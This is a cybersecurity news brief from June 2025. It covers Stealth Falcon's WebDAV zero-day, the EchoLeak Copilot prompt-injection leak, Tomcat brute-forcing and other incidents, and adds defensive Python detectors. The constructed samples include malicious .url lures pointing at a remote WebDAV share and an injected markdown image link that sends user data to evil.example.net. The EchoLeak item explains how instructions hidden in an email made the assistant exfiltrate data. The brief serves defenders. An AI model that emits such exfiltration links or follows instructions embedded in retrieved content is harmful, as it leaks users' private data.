Svoboda Cybersecurity Brief June 12, 2025

Stealth Falcon Exploits WebDAV Zero-Day in Targeted Attacks

The APT group Stealth Falcon exploited CVE-2025-33053, a WebDAV zero-day vulnerability, to execute remote code via crafted .url files. Attacks targeted defense and government entities in Turkey, Qatar, Egypt, and Yemen, deploying the Horus Agent malware for espionage. Microsoft patched the flaw in June 2025's Patch Tuesday.
Impact: Remote code execution on the victim's machine in the context of the user who opens the crafted .url file, with an attacker-controlled WebDAV share used to stage the payload.
Mitigation: Apply Microsoft's June 2025 patch immediately; block or tightly restrict outbound WebDAV traffic at the perimeter, and disable the Windows WebClient service on hosts that do not need it.
Source: BleepingComputer
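The brief describes the lure only as a crafted .url file that pulls code over WebDAV. A .url file is a small INI-style file ([InternetShortcut] section with URL=, WorkingDirectory=, IconFile= and similar keys), so one cheap triage check is to parse any .url attachments and flag fields that point at a remote UNC or WebDAV path. The scanner below is an added example written for this brief, not Stealth Falcon's lure nor any vendor's detection logic; the sample .url contents, the hosts and the heuristics (the Windows \\host@80\ and \\host@SSL\ WebDAV UNC syntax, the DavWWWRoot marker, file:// URLs with a remote host) are constructed here as assumptions.

```python
import configparser
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample .url files for the demo (not real malware samples).
SAMPLES: Dict[str, str] = {
    "benign.url": "[InternetShortcut]\nURL=https://example.org/docs\n",
    "webdav_workdir.url": (
        "[InternetShortcut]\n"
        "URL=file:///C:/Windows/System32/notepad.exe\n"
        "WorkingDirectory=\\\\203.0.113.10@80\\DavWWWRoot\\share\n"
    ),
    "webdav_ssl_icon.url": (
        "[InternetShortcut]\n"
        "URL=https://example.org/\n"
        "IconFile=\\\\files.example.net@SSL@443\\DavWWWRoot\\icon.ico\n"
    ),
    "unc_url.url": "[InternetShortcut]\nURL=file://203.0.113.10/share/run.exe\n",
}

# \\host\...  (UNC path; group 1 is the host segment, which may carry @port/@SSL)
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")
# file://host/...  (only matches when a host is present; file:///C:/... has none)
FILE_URL_RE = re.compile(r"^file://([^/\\]+)[/\\]", re.IGNORECASE)
# Windows WebDAV UNC host syntax: \\host@80\..., \\host@SSL\..., \\host@SSL@443\...
WEBDAV_HOST_RE = re.compile(r"@(ssl|\d+)\b", re.IGNORECASE)
LOCAL_HOSTS = {"localhost", "127.0.0.1", "."}


def classify_value(value: str) -> Optional[str]:
    """Return a reason string if a .url field value points at a remote share, else None."""
    v = value.strip()
    m = UNC_RE.match(v)
    if m:
        host = m.group(1)
        if WEBDAV_HOST_RE.search(host) or "davwwwroot" in v.lower():
            return "webdav UNC path"
        if host.split("@")[0].lower() not in LOCAL_HOSTS:
            return "remote UNC path"
        return None
    m = FILE_URL_RE.match(v)
    if m and m.group(1).lower() not in LOCAL_HOSTS:
        return "file:// URL with remote host"
    return None


def scan_url_file(name: str, text: str) -> List[Tuple[str, str, str]]:
    """Parse one .url file and return (file, field, reason) for every suspicious field."""
    # .url files are INI-like; '=' is the only delimiter (':' appears inside URLs),
    # no %-interpolation, and we keep the original key case for reporting.
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.optionxform = str  # type: ignore[assignment]
    cp.read_string(text)
    findings: List[Tuple[str, str, str]] = []
    if not cp.has_section("InternetShortcut"):
        return findings
    for field, value in cp.items("InternetShortcut"):
        reason = classify_value(value)
        if reason:
            findings.append((name, field, reason))
    return findings


def scan_all(samples: Dict[str, str]) -> List[Tuple[str, str, str]]:
    """Scan a mapping of filename -> file contents and collect all findings."""
    out: List[Tuple[str, str, str]] = []
    for name, text in samples.items():
        out.extend(scan_url_file(name, text))
    return out


if __name__ == "__main__":
    for name, field, reason in scan_all(SAMPLES):
        print(f"{name}: {field} -> {reason}")
```

The check deliberately ignores plain https:// shortcuts and local file:/// paths, so it stays quiet on ordinary shortcuts and fires on the property that matters here: a shortcut whose working directory, icon or target resolves to somebody else's WebDAV share.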

INTERPOL Disrupts 20,000 Malicious IPs and Domains in Operation Secure

A global law enforcement operation took down 20,000 malicious IP addresses and domains linked to 69 infostealer variants, including Lumma and RisePro. Authorities seized 41 servers, arrested 32 suspects, and notified 216,000 victims. The operation spanned 26 countries and targeted the credential theft that feeds ransomware and BEC attacks.
Source: The Hacker News

Erie Insurance Confirms Cyberattack Disrupting Services

Erie Insurance suffered a cyberattack on June 7, 2025, causing widespread outages to customer portals and claims processing. The company activated incident response protocols but has not confirmed ransomware or data theft.
Impact: Business operations halted for days; customer data may be at risk.
Mitigation: Monitor for phishing attempts; avoid sharing credentials during outages.
Source: BleepingComputer

Microsoft Patches 67 Flaws Including Active WebDAV Zero-Day

June 2025 Patch Tuesday addressed 67 vulnerabilities, including the exploited CVE-2025-33053 (WebDAV RCE) and CVE-2025-33073 (SMB privilege escalation). The SMB flaw has public PoCs, raising exploitation risks.
Impact: Unpatched systems vulnerable to remote takeover.
Mitigation: Prioritize patches for WebDAV, SMB, and CLFS driver flaws.
Source: KrebsOnSecurity

Dutch Police Identify 126 Cracked.io Users in Cybercrime Crackdown

Dutch authorities identified 126 users of the hacking forum Cracked.io, with ages ranging from 11 to 20 years. Eight face criminal charges, while others received warnings. The operation highlighted risks of minor involvement in cybercrime.
Source: DataBreaches.net

Apache Tomcat Brute-Force Attacks Target Exposed Panels

Over 400 unique IPs launched coordinated brute-force attacks against Apache Tomcat Manager interfaces, most of them from DigitalOcean infrastructure. No specific vulnerability was abused; the campaign relies on weak or default credentials.
Impact: Unauthorized access to web app management interfaces, which allows deploying arbitrary WAR files and therefore code execution on the server.
Mitigation: Enforce strong, unique credentials and account lockout; restrict Manager access by source address (Tomcat's RemoteAddrValve) or bind it to localhost; remove the manager webapp entirely on servers that do not need it.
Source: BleepingComputer
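A distributed campaign like this one is easy to miss with a per-IP lockout alone, because each of 400 sources can stay under the threshold. The script below is an added example for this brief (not GreyNoise's or BleepingComputer's detection logic): it parses Tomcat access-log lines in the common "%h %l %u %t \"%r\" %s %b" format, counts 401/403 responses against /manager paths per source with a sliding time window, and separately flags the campaign-level signal, many distinct sources failing against the same interface. The log lines, IPs, thresholds and window are constructed here as assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, Iterable, List, Optional

# Constructed Tomcat access-log sample (common pattern: %h %l %u %t "%r" %s %b).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jun/2025:14:02:11 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.5 - - [10/Jun/2025:14:02:12 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.5 - - [10/Jun/2025:14:02:13 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.5 - - [10/Jun/2025:14:02:14 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.5 - - [10/Jun/2025:14:02:15 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.5 - - [10/Jun/2025:14:02:16 +0000] "GET /manager/html HTTP/1.1" 401 2473
198.51.100.20 - - [10/Jun/2025:14:03:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
198.51.100.21 - - [10/Jun/2025:14:05:40 +0000] "GET /manager/text/list HTTP/1.1" 401 2473
198.51.100.22 - - [10/Jun/2025:14:07:05 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.8 - ops [10/Jun/2025:14:08:00 +0000] "GET /manager/html HTTP/1.1" 200 19110
192.0.2.9 - - [10/Jun/2025:14:09:00 +0000] "GET /docs/ HTTP/1.1" 404 1070
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
MANAGER_PREFIX = "/manager"


def parse_line(line: str) -> Optional[dict]:
    """Parse one access-log line; return None for lines that do not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def max_in_window(stamps: List[datetime], window: timedelta) -> int:
    """Largest number of events that fall inside any window-sized interval."""
    stamps = sorted(stamps)
    best, j = 0, 0
    for i in range(len(stamps)):
        while stamps[i] - stamps[j] > window:
            j += 1
        best = max(best, i - j + 1)
    return best


def detect_manager_bruteforce(
    lines: Iterable[str],
    per_ip_threshold: int = 5,
    distinct_ip_threshold: int = 3,
    window: timedelta = timedelta(minutes=10),
) -> Dict[str, object]:
    """Flag noisy single sources and the distributed, low-and-slow pattern against /manager."""
    failures: Dict[str, List[datetime]] = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["path"].startswith(MANAGER_PREFIX) and rec["status"] in (401, 403):
            failures[rec["ip"]].append(rec["ts"])

    noisy_ips = {}
    for ip, stamps in failures.items():
        burst = max_in_window(stamps, window)
        if burst >= per_ip_threshold:
            noisy_ips[ip] = burst

    return {
        "noisy_ips": noisy_ips,                       # classic per-IP brute force
        "distinct_failing_ips": len(failures),        # breadth of the source pool
        "distributed_campaign": len(failures) >= distinct_ip_threshold,
    }


if __name__ == "__main__":
    print(detect_manager_bruteforce(SAMPLE_LOG.splitlines()))
```

In the sample, one source trips the per-IP rule with six failures in five seconds, while three other sources make a single attempt each; only the distinct-source count catches the latter, which is the shape of the campaign described above.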

Zero-Click AI Data Leak Flaw in Microsoft 365 Copilot

The EchoLeak vulnerability (CVE-2025-32711) allowed silent exfiltration of sensitive data: a malicious email landing in Copilot's retrieval context carried instructions that made the assistant embed data from the user's context into an image link, which was then fetched without any user interaction. Microsoft patched it server-side in May 2025.
Impact: Unintended LLM data leaks via markdown image exfiltration; no click or user action was required.
Mitigation: Treat retrieved content such as inbound email as untrusted input to the model; block automatic rendering of external images and links in LLM output, and allowlist the domains such output may reference.
Source: BleepingComputer
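The exfiltration channel in EchoLeak is an image link the client renders automatically, with the secret encoded in the URL. The function below is an added example for this brief, not Microsoft's fix nor Aim Security's proof of concept: it post-processes assistant output, resolves both inline and reference-style markdown images (reference style matters, because naive link scrubbers often only look for the inline form), drops any image whose host is not on an allowlist, and records what the URL would have carried. The sample output, the allowlisted host and the attacker domain are constructed here as assumptions.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote, urlparse

# Assumption: hosts our own client is permitted to fetch images from.
ALLOWED_HOSTS = {"intranet.example.com"}

# Constructed assistant output with a prompt-injected reference-style image.
SAMPLE_OUTPUT = """Here is the summary you asked for.

![Q3 chart](https://intranet.example.com/charts/q3.png)

![loading][1]

[1]: https://evil.example.net/log.png?d=Project%20Falcon%20budget%3A%204.2M

Thanks!
"""

INLINE_IMG_RE = re.compile(r"!\[([^\]]*)\]\(\s*(<[^>]*>|[^\s)]+)[^)]*\)")   # ![alt](url "title")
REF_IMG_RE = re.compile(r"!\[([^\]]*)\]\[([^\]]*)\]")                      # ![alt][label] / ![alt][]
REF_DEF_RE = re.compile(r"^\s*\[([^\]]+)\]:\s*(\S+)", re.MULTILINE)         # [label]: url


def is_allowed_url(url: str) -> bool:
    """Relative URLs are served by our own app; anything with a host must be https and allowlisted."""
    p = urlparse(url.strip("<>"))
    if not p.netloc:
        return True
    return p.scheme == "https" and p.netloc.lower() in ALLOWED_HOSTS


def sanitize_markdown(text: str) -> Tuple[str, List[Tuple[str, str, str]]]:
    """Strip images pointing off-allowlist; return (clean_text, [(kind, host, decoded_query)])."""
    findings: List[Tuple[str, str, str]] = []
    refs = {label.lower(): url for label, url in REF_DEF_RE.findall(text)}

    def record(kind: str, url: str) -> str:
        p = urlparse(url.strip("<>"))
        findings.append((kind, p.netloc.lower(), unquote(p.query)))
        return "[image removed]"

    def repl_inline(m: "re.Match[str]") -> str:
        url = m.group(2)
        return m.group(0) if is_allowed_url(url) else record("inline", url)

    def repl_ref(m: "re.Match[str]") -> str:
        label = (m.group(2) or m.group(1)).lower()   # ![alt][] uses the alt text as label
        url = refs.get(label, "")
        if url and is_allowed_url(url):
            return m.group(0)
        return record("reference", url)

    def repl_def(m: "re.Match[str]") -> str:
        return m.group(0) if is_allowed_url(m.group(2)) else ""

    out = INLINE_IMG_RE.sub(repl_inline, text)
    out = REF_IMG_RE.sub(repl_ref, out)
    out = REF_DEF_RE.sub(repl_def, out)   # also drop the definition line itself
    return out, findings


if __name__ == "__main__":
    clean, hits = sanitize_markdown(SAMPLE_OUTPUT)
    print(clean)
    for kind, host, query in hits:
        print(f"blocked {kind} image to {host}; would have sent: {query}")
```

The decoded query string in each finding is the useful forensic artifact: it shows exactly which piece of the user's context the injected instruction tried to smuggle out, which is what an incident responder needs when triaging this class of leak.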

40,000 Security Cameras Exposed via HTTP/RTSP

Bitsight found 40,000+ cameras globally leaking live feeds over HTTP or RTSP because of default credentials or missing authentication. Most were in the US (14,000) and Japan (7,000), and by sector the telecoms (79%) and technology (6%) industries were most affected.
Impact: Privacy violations, physical reconnaissance and espionage, and a foothold for pivoting into the camera's network.
Mitigation: Change default credentials; keep HTTP/RTSP interfaces off the public internet (VPN or access-controlled network), and disable remote access entirely if unused.
Source: SecurityWeek

Former Black Basta Members Shift to Teams Phishing and Python Scripts

Ex-Black Basta actors now use Microsoft Teams phishing and Python scripts (e.g., cURL-based payload retrievals) for initial access. Attacks impersonate help desks, targeting finance and construction sectors.
Source: The Hacker News

SinoTrack GPS Devices Vulnerable to Remote Vehicle Control

CVE-2025-5484 and CVE-2025-5485 in SinoTrack GPS devices allow unauthorized access via default passwords and predictable usernames derived from the device identifier. An attacker with that access can track the vehicle and trigger functions such as cutting power to the fuel pump.
Impact: Vehicle operations compromised; driver location exposed.
Mitigation: Change the default password; keep the device identifier from which the username is derived out of public view.
Source: The Hacker News

RCMP Loses Unencrypted USB with Informant Data to Criminals

A lost RCMP USB drive containing 1,741 individuals’ data (witnesses, officers, informants) was sold on criminal markets. The breach occurred in 2022 but was disclosed in 2025.
Impact: High-risk exposure of sensitive law enforcement data.
Mitigation: Encrypt portable storage; enforce data handling policies.
Source: DataBreaches.net

DanaBot’s C&C Servers Leaked Data for 3 Years Before Takedown

The DanaBleed flaw in DanaBot’s C&C servers exposed attacker IPs, victim credentials, and backend details from 2022–2025. Law enforcement disrupted the botnet in May 2025.
Source: SecurityWeek

UEFI Secure Boot Bypass via DTResearch Apps (CVE-2025-3052)

A flaw in DTResearch’s UEFI apps (signed by Microsoft) allows Secure Boot bypass via NVRAM variable manipulation. Microsoft added hashes to its DBX blocklist.
Impact: Pre-OS malware persistence.
Mitigation: Apply DBX updates; monitor firmware integrity.
Source: SecurityWeek

Fortinet and Ivanti Patch High-Severity Flaws

Fortinet fixed CVE-2025-31104 (command injection in FortiADC) and Ivanti addressed hardcoded keys in Workspace Control (CVE-2025-5353). No exploits reported.
Source: SecurityWeek

Cyera Raises $540M for AI Data Security Platform

Cyera’s $540M Series E funding (total $1.3B) will expand its AI-driven data classification and security tools, focusing on generative AI risks.
Source: SecurityWeek
